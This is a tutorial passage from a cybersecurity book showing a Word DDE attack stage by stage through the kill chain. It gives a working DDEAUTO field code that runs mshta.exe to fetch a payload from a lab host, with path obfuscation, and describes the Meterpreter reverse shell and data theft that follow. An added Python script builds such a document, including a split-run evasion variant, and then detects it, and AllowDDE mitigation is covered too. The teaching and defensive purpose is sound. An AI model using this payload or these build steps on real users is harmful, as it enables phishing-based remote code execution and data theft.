Hands-On Cybersecurity with Blockchain: Implement DDoS protection, PKI-based identity, 2FA, and DNS security using Blockchain

Product type: Paperback
Published: Jun 2018
Publisher: Packt
ISBN-13: 9781788990189
Length: 236 pages
Edition: 1st Edition
Author: Rajneesh Gupta

Table of Contents (13 chapters)

Preface
1. Cyber Threat Landscape and Security Challenges
2. Security Must Evolve
3. Introducing Blockchain and Ethereum
4. Hyperledger – Blockchain for Businesses
5. Blockchain on the CIA Security Triad
6. Deploying PKI-Based Identity with Blockchain
7. Two-Factor Authentication with Blockchain
8. Blockchain-Based DNS Security Platform
9. Deploying Blockchain-Based DDoS Protection
10. Facts about Blockchain and Cyber Security
11. Assessment
12. Other Books You May Enjoy

Live attack execution

In recent attacks, adversaries have run arbitrary code from a Microsoft Word document without using any macros or scripts. The technique abuses Dynamic Data Exchange (DDE), a legitimate Microsoft Office feature for pulling data from other applications, which can be made to launch an arbitrary program when the document's fields are updated.

Let's look at this attack from a cyber kill chain perspective. The cyber kill chain describes an attack as a sequence of stages:

  • Reconnaissance: This is the planning phase, in which the attacker gathers information about the target through observation or other collection methods. Cyberattack planning and reconnaissance usually start with research about the target using open source information-gathering tools, such as Google and Shodan, and with searches of publicly available data, such as public announcements, social media, company profiles, and harvested email addresses.
  • Weaponization: In this stage, the threat actor chooses the attack method, for example phishing an employee by email or staging a drive-by download. In our example, we first create a malicious document. In a blank document, go to Insert | Quick Parts | Field..., as shown in the following screenshot:

In the Field names dialog box, select the =(Formula) option; this is the field we will turn into our DDE exploit code:

After this, the document shows a field containing the error !Unexpected End of Formula. Right-click that field and choose Toggle Field Codes, which exposes the field code so that it can be replaced with a DDE instruction. Whatever command the instruction names is started when the document is opened and its fields are updated:

In the field code, enter the following. The Office-looking path after DDEAUTO does not need to exist: the \..\ segments resolve it to C:\windows\system32\mshta.exe, so what actually runs is mshta.exe fetching the attacker's URL, while the path shown to the user begins like an Office program:

DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK"

Then, save the document under any name of your choice, such as Financial_Statement:

  • Delivery: Endpoints are the primary means of delivery, whether through a drive-by download from a website, a targeted phishing email, or an infected employee-owned device connecting over the corporate virtual private network (VPN).
  • Exploitation and installation: At this stage, the attacker takes advantage of a software or human weakness to get the payload to run. In DDE exploitation, adversaries send an email that contains the malicious document. When the user opens the document and accepts Word's prompts to update the fields and to start the named application, the adversaries obtain a reverse shell on the victim's machine.
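The weaponization steps above build, by hand, what ends up inside the .docx: a complex field whose instruction begins with DDEAUTO. The following Python script is an added example, not code from the book, that writes such a document the way Word stores it (fldChar begin, instrText runs, fldChar separate, the field result, fldChar end) and then scans .docx files for DDE field codes, which is the check a defender would run over inbound attachments. The OPC package parts, the split-run variant and the benign DATE field are constructed here; the DDEAUTO field code is the one from this chapter.

```python
"""Added example: build a .docx carrying a DDEAUTO field as Word stores it, then
scan .docx files for DDE/DDEAUTO field codes, including fields split across runs."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{" + W_NS + "}"  # ElementTree's Clark-notation prefix for the w: namespace

# Minimal OPC package: a .docx is a zip with a content-types manifest, root .rels and the body part.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>')
ROOT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    '</Relationships>')

# The field code from the chapter (constructed sample; IP, port and path are the book's lab values).
PAGE_PAYLOAD = (r'DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe '
                r'"http://192.168.1.101:8080/8b0HTF3MdgqYqgK"')


def _xml_escape(s: str) -> str:
    return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


def build_docx(field_instruction: str, split_runs: bool = False) -> bytes:
    """Return a one-paragraph .docx whose only content is a complex field with the given
    instruction, mirroring what Word writes after Insert | Quick Parts | Field and
    Toggle Field Codes. With split_runs=True the instruction is spread over many short
    instrText runs, an evasion that defeats a plain grep for 'DDEAUTO' on document.xml."""
    chunks = ([field_instruction[i:i + 3] for i in range(0, len(field_instruction), 3)]
              if split_runs else [field_instruction])
    instr_runs = "".join(
        f'<w:r><w:instrText xml:space="preserve">{_xml_escape(c)}</w:instrText></w:r>'
        for c in chunks)
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        f'{instr_runs}'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'  # the cached field result Word shows
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", ROOT_RELS)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Parts of a .docx that can hold field codes (body, headers/footers, notes, comments).
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*|footnotes|endnotes|comments)\.xml$")
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def field_instructions(part_xml: bytes) -> List[str]:
    """Return every field instruction in one XML part. Simple fields keep it in a w:instr
    attribute; complex fields spread it over w:instrText runs between fldChar begin and
    fldChar end, and fields may nest (e.g. QUOTE wrapping DDEAUTO), so runs are accumulated
    per outermost field while the begin/end depth counter is non-zero."""
    root = ET.fromstring(part_xml)
    found, depth, current = [], 0, []
    for el in root.iter():  # document order
        if el.tag == W + "fldSimple":
            found.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    found.append("".join(current))
                    current = []
        elif el.tag == W + "instrText" and depth > 0:
            current.append(el.text or "")
    return found


def find_dde_fields(docx_bytes: bytes) -> List[Tuple[str, str]]:
    """Scan a .docx and return (part name, normalised instruction) for each DDE/DDEAUTO field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not PART_RE.match(name):
                continue
            for instr in field_instructions(z.read(name)):
                norm = " ".join(instr.split())  # rejoin text that was split across runs
                if DDE_RE.search(norm):
                    hits.append((name, norm))
    return hits


if __name__ == "__main__":
    for label, doc in [("page payload", build_docx(PAGE_PAYLOAD)),
                       ("split runs", build_docx(PAGE_PAYLOAD, split_runs=True)),
                       ("benign DATE field", build_docx('DATE \\@ "d MMMM yyyy"'))]:
        print(label, "->", find_dde_fields(doc) or "clean")
```

The scanner only looks at field codes, so an ordinary document with DATE or PAGE fields is reported clean, while the split-run variant is still caught because instrText fragments are concatenated before matching. On the endpoint side, Microsoft's ADV170021 guidance added the AllowDDE registry value under HKCU\Software\Microsoft\Office\<version>\Word\Security; setting it to 0 disables DDE in Word so the field is never executed even if the user clicks through the prompts.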

Let's see how the adversaries used the document built during the weaponization stage and how they gained access to the victim's machine. The adversaries created the malicious payload document and sent it to the victim by email. Take a look at the following screenshot:

When the user opened the document sent by the adversaries, the payload was executed once the user had clicked through Word's warning prompts (one asking whether to update the document's fields, and one asking whether to start the application named in the field), as shown in the following screenshot:

If the user chooses to start the application, the payload is executed and a Meterpreter session, the attacker's command-and-control channel into the machine, opens:

  • Actions on objectives: At this point the threat actor has succeeded and has access to the organization's sensitive files. The adversary tries to exfiltrate data from the victim's machine. There are many confidential files here that the adversaries try to exfiltrate:

The adversaries take a screenshot of what the victim is doing and enumerate the processes running on the machine, as shown in the following screenshot:
